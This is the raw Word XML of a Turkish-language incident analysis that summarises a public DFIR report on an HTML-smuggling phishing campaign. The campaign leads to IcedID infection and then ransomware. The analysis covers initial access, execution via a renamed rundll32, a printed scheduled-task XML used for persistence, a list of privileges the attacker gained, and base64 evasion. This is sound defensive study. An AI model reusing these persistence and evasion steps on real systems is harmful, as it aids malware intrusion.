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0959021" w:rsidP="12897420" w:rsidRDefault="50959021" w14:paraId="21AD74DB" w14:textId="11FCFE2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tr-TR"/>
        </w:rPr>
      </w:pPr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tr-TR"/>
        </w:rPr>
        <w:t>Rapor Başlığı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="50959021" w:rsidP="12897420" w:rsidRDefault="50959021" w14:paraId="48722070" w14:textId="6CB4270C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</w:pPr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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Saldırı Adı: </w:t>
      </w:r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 xml:space="preserve">HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>Smuggling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>Leads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>Wide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="50959021" w:rsidP="12897420" w:rsidRDefault="50959021" w14:paraId="7A7A652C" w14:textId="4CE25A7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tr-TR"/>
        </w:rPr>
      </w:pPr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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapor Kaynağı: </w:t>
      </w:r>
      <w:hyperlink r:id="Re30fb59a64ef49e9">
        <w:r w:rsidRPr="12897420" w:rsidR="50959021">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1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6"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="tr-TR"/>
          </w:rPr>
          <w:t>https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="06B526E6" w14:textId="1FA1788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tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="5D95F03B" w14:textId="676B5C8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tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="50959021" w:rsidP="12897420" w:rsidRDefault="50959021" w14:paraId="2E0F0C42" w14:textId="1090EB5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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tr-TR"/>
        </w:rPr>
      </w:pPr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tr-TR"/>
        </w:rPr>
        <w:t>Özet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="0E773624" w14:textId="14A16160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tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="42F2C230" w:rsidP="12897420" w:rsidRDefault="42F2C230" w14:paraId="4F963A6D" w14:textId="5296D419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tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="12897420" w:rsidR="42F2C2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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> INITIAL ACCSESS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BD2FD34" w:rsidP="12897420" w:rsidRDefault="1BD2FD34" w14:paraId="7D54E24E" w14:textId="09B44544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BD2FD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      </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="5095902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Saldırı ilk olarak kurbana bir mail gelmesi ile başlıyor</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="0639EB4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.  Mailde bir HTML dosyası var. Kurban bunu indirip tıkladı</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="216784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ğı zaman ekranına sahte bir Adobe sayfası geliyor. Bu sırada arakadan bir .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="216784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zip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="216784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uzantılı dosya iniyor</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3A40D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. Gelen Adobe ekranında .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A40D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zip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A40D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uzantılı dosyanın şifresi var. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A40D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Zipi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A40D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açtığınızda</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="065817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document-35068.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="065817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>iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="065817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açılıyor ve</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3A40D4C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 sizin gördüğünüz LNK d</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="19C8D14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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">osyası olan documents-9771 ve göremediğiniz 3 dosya olan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="19C8D14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demurest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="19C8D14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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="19C8D14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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="19C8D14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, pimpliest_kufic.ve templates544.png.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2382A9C2" w:rsidP="12897420" w:rsidRDefault="2382A9C2" w14:paraId="6C0B6E39" w14:textId="7A089B9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</w:pPr>
      <w:r w:rsidRPr="12897420" w:rsidR="2382A9C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2382A9C2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  <w:t>EXECUTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A6E180F" w:rsidP="12897420" w:rsidRDefault="2A6E180F" w14:paraId="1EFB84AB" w14:textId="60862CC5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2A6E18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</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6A4EF19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Siz  documents</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="43FC21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-9771</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6A4EF19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adlı dosyaya tıkladıktan sonra</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="068D66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068D66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demurest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="068D66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.cmd kendini çalıştırmaya başlıyor. Sırasıyla</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="31376F9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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="525D1317" w:rsidP="12897420" w:rsidRDefault="525D1317" w14:paraId="3C79C25D" w14:textId="0408B76B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pimpliest_kufic.png açılı</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="169434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</w:p>
    <w:p w:rsidR="525D1317" w:rsidP="12897420" w:rsidRDefault="525D1317" w14:paraId="765866A7" w14:textId="0A9F16E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Windows yardımcı programı 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xcopy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, rundll32.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</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="0C4BA3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’nin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="0C4BA3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ismini</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="658A9A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%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temp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%\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entails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40C1A1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olarak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kopyalamak için kullanıldı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="525D1317" w:rsidP="12897420" w:rsidRDefault="525D1317" w14:paraId="51426BAF" w14:textId="3226662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Çalışma zamanında “templates544.png” dizesi oluşturuldu ve bir formatla rastgele bir sayı ile kopyalandı: RANDOM_NUM.RANDOM_NUM.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="368E42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</w:p>
    <w:p w:rsidR="525D1317" w:rsidP="12897420" w:rsidRDefault="525D1317" w14:paraId="7CC28D0C" w14:textId="656E003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templates544.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png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bir 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IcedID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DLL ve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entails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aracılığıyla çalışt</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="0E7003F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ırıyor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="525D1317" w:rsidP="12897420" w:rsidRDefault="525D1317" w14:paraId="7C7D1AEB" w14:textId="7FE861C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  <w:r w:rsidR="525D1317">
        <w:drawing>
          <wp:inline wp14:editId="4897D141" wp14:anchorId="7641BECE">
            <wp:extent cx="5724524" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1876055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4efe9efa5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>Yani</w:t>
      </w:r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 xml:space="preserve"> aslında templates544.png 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>yi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>temp’in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="525D1317">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> altında rastge</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6A636C47">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>le bir klasör oluşturarak kopyalıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="764FCEB0" w14:textId="65D063B6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="3230D887" w14:textId="123E5C5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75AD4661" w14:textId="7F22574D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</w:p>
    <w:p w:rsidR="2BE032A6" w:rsidP="12897420" w:rsidRDefault="2BE032A6" w14:paraId="2553217C" w14:textId="414B1627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12897420" w:rsidR="2BE032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PERSISTENCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="791181F8" w:rsidP="12897420" w:rsidRDefault="791181F8" w14:paraId="35256BAA" w14:textId="753639A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791181F8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="33829FA7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="33829FA7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> kendisini görev zamanlayıcısına saat başı çalışacak şekilde kaydediyor</w:t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</w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55DAB150" w:rsidP="12897420" w:rsidRDefault="55DAB150" w14:paraId="22B80950" w14:textId="529807C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&lt;?xml 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version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="1.0" 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encoding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="UTF-16"?&gt;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Task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version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="1.2" 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xmlns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="http://schemas.microsoft.com/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windows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/2004/02/mit/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task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RegistrationInfo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&lt;URI&gt;\{E5C1C7DB-E36E-5B16-8E3A-6226D7E53A67}&lt;/URI&gt;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RegistrationInfo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Triggers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TimeTrigger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id="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TimeTrigger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Repetition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Interval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&gt;PT1H&lt;/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Interval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StopAtDurationEnd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StopAtDurationEnd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Repetition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StartBoundary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&gt;2012-01-01T12:00:00&lt;/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StartBoundary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Enabled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Enabled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TimeTrigger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LogonTrigger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id="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LogonTrigger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Enabled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Enabled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UserId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&gt;REDACTED&lt;/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UserId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LogonTrigger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Triggers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Principals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Principal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id="Author"&gt;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RunLevel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HighestAvailable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RunLevel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UserId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&gt;REDACTED&lt;/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UserId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LogonType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InteractiveToken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LogonType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Principal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Principals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Settings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MultipleInstancesPolicy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IgnoreNew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MultipleInstancesPolicy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DisallowStartIfOnBatteries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DisallowStartIfOnBatteries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StopIfGoingOnBatteries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StopIfGoingOnBatteries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AllowHardTerminate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AllowHardTerminate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StartWhenAvailable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StartWhenAvailable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RunOnlyIfNetworkAvailable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RunOnlyIfNetworkAvailable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IdleSettings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Duration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&gt;PT10M&lt;/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Duration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WaitTimeout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&gt;PT1H&lt;/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WaitTimeout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StopOnIdleEnd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StopOnIdleEnd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RestartOnIdle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RestartOnIdle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IdleSettings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AllowStartOnDemand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AllowStartOnDemand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Enabled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Enabled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Hidden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Hidden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RunOnlyIfIdle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RunOnlyIfIdle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WakeToRun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false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WakeToRun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ExecutionTimeLimit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&gt;PT0S&lt;/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ExecutionTimeLimit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Priority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&gt;7&lt;/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Priority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Settings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Actions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Context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="Author"&gt;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Exec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Command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&gt;rundll32.exe&lt;/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Command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  &lt;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Arguments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&gt;"C:\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\REDACTED\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AppData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\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Local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\REDACTED\Izjeubaw64.dll</w:t>
      </w:r>
      <w:proofErr w:type="gram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",#</w:t>
      </w:r>
      <w:proofErr w:type="gram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1 --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oyxo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="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EdgeDecrease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\license.dat"&lt;/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Arguments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Exec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 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Actions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  <w:r>
        <w:br/>
      </w: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&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Task</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55DAB150" w:rsidP="12897420" w:rsidRDefault="55DAB150" w14:paraId="60527CF7" w14:textId="573131B6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55DAB15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Çalıştırılan komut rundll.32.exe.  </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="436ECDC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C:\Users\REDACTED\ altında .dll uzantılı dosyaya kaydediyor. </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="7CB8A7A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Son kısımda \Izjeubaw64.dll</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7CB8A7A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",#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7CB8A7A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1</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3F197A3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3F197A3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#1:</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3F197A3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DLL içindeki birinci fonksiyonun çağrıldığını belirtir. Dll ise rastgele oluşturulmuş gibi gözüküyo</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6DF4FBB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r</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="20300B2E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. </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="28D4FC3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Anladığım kadarıyla </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="28D4FC3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EdgeDecrease</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="28D4FC3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bir program ve license.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="28D4FC3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dat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="28D4FC3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dosyasını kullanarak güvenlik duvarından kaçmaya çalışıyor</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="46FCD20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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="434D943C" w14:textId="4CA7FD9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</w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="1ADD700F" w14:textId="020F933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PRIVILEGE ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="71E3DB70" w14:textId="62A46DC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Saldırganın yerel yetkilere izni vardı aşağıdakini çalıştırarak </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="1BFEF2A3" w14:textId="2EC1E12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SeSecurityPrivilege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Güvenlik denetimlerini ve günlüklerini yönetme </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="2E51159E" w14:textId="5CD2831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SeTakeOwnershipPrivilege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Bir dosya veya nesnenin sahipliğini devralma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="07BD7B45" w14:textId="222C1A3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SeLoadDriverPrivilege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Sürücü yükleme </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="799C7FAF" w14:textId="22418AF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SeBackupPrivilege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Dosya ve dizinleri yedekleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="0B7A4B7B" w14:textId="38F3CE6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SeRestorePrivilege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Dosya ve dizinleri geri yükleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="3BBED8A6" w14:textId="1FA557E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SeDebugPrivilege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İşlem hata ayıklama </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="725E060C" w14:textId="35B46D4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SeSystemEnvironmentPrivilege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Sistem ortamını değiştirme </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="41B469CD" w14:textId="713A870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SeImpersonatePrivilege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Başka bir kullanıcıyı taklit etme </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="77B9CD4E" w14:textId="1C455B2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SeDelegateSessionUserImpersonatePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spell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tr-TR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="509EB15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Kullanıcı taklit oturumları için </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="56B09800" w14:textId="287BF2CD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proofErr w:type="gramStart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yetkilerini</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="509EB1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 aldı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="509EB158" w:rsidP="12897420" w:rsidRDefault="509EB158" w14:paraId="7145E6D9" w14:textId="65FEABF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  <w:r w:rsidR="509EB158">
        <w:drawing>
          <wp:inline wp14:editId="043290F6" wp14:anchorId="3FB1F6B0">
            <wp:extent cx="4931600" cy="4160270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1467768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bf4cf95ed4c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00" cy="4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3EC31398" w14:textId="404CA21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</w:p>
    <w:p w:rsidR="5EC03FD1" w:rsidP="12897420" w:rsidRDefault="5EC03FD1" w14:paraId="66A531AD" w14:textId="630A50D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5EC03FD1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6055B114" w:rsidP="12897420" w:rsidRDefault="6055B114" w14:paraId="1C3D12E2" w14:textId="061DF574">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="338" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="defense-evasion" r:id="Raf208fe1d2d741ab">
        <w:r w:rsidRPr="12897420" w:rsidR="6055B114">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAsci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222222"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="none"/>
            <w:lang w:val="tr-TR"/>
          </w:rPr>
          <w:t>Defense Evasion</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6055B114" w:rsidP="12897420" w:rsidRDefault="6055B114" w14:paraId="401C126E" w14:textId="3DB318E8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</w:pPr>
      <w:r w:rsidRPr="12897420" w:rsidR="6055B114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Saldırgan engellere takılmamak için HTML dosya içeriğindeki &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6055B114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script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6055B114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&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6055B114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tagları</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6055B114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arasında kalan kısmı base64 olarak kodlamış ve </w:t>
      </w:r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içindeki kodu dönüştürdüğümüzde çıkan dosyayı </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hexeditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ile </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="75C45754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açıp</w:t>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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magic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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headerların</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="62E9A338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a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="62E9A338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baktığımızda </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="1F4DB2A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“PK”</w:t>
      </w:r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görürüz. Her dosyanın kendine özel bir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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magic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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headerı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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vardır. “PK” ile başlayan dosyalar .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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zip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="1BA388BC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uzantılı</w:t>
      </w:r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dır. Bunu yapmasının sebebi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hexeditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ile açtığımızda </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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zip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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dosyasının içinde .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="55B123F7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 xml:space="preserve"> uzantılı dosyayı görebiliyoruz</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6E140FE6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E140FE6" w:rsidP="12897420" w:rsidRDefault="6E140FE6" w14:paraId="60C33151" w14:textId="7CE43452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6E140FE6">
        <w:drawing>
          <wp:inline wp14:editId="32B7FCDE" wp14:anchorId="1E74F49C">
            <wp:extent cx="5724524" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1854390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571624cbdc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56337A3A" w14:textId="3079F5B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6E140FE6" w:rsidP="12897420" w:rsidRDefault="6E140FE6" w14:paraId="697F7D23" w14:textId="6B592D66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6E140FE6">
        <w:drawing>
          <wp:inline wp14:editId="67D59B03" wp14:anchorId="2B9880CE">
            <wp:extent cx="5724524" cy="4705352"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30070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28aa2f456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6DF4F" w:rsidP="12897420" w:rsidRDefault="5CA6DF4F" w14:paraId="0A8E8BA0" w14:textId="05211B74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5CA6DF4F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Rundll32.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5CA6DF4F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5CA6DF4F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> ilk başta kendini ismini entails.exe olarak değiştiriyor ki makinede rundll.32 çalıştığı gözükmesin. Bu da bir n</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="4AF86406">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>evi kaçınma yöntemidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54541874" w:rsidP="12897420" w:rsidRDefault="54541874" w14:paraId="312C3AB9" w14:textId="5612AA7F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5454187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Entail.exe’nin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5454187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içinde bir tane de loader_dll64.dll olduğunu görüyoruz</w:t>
      </w:r>
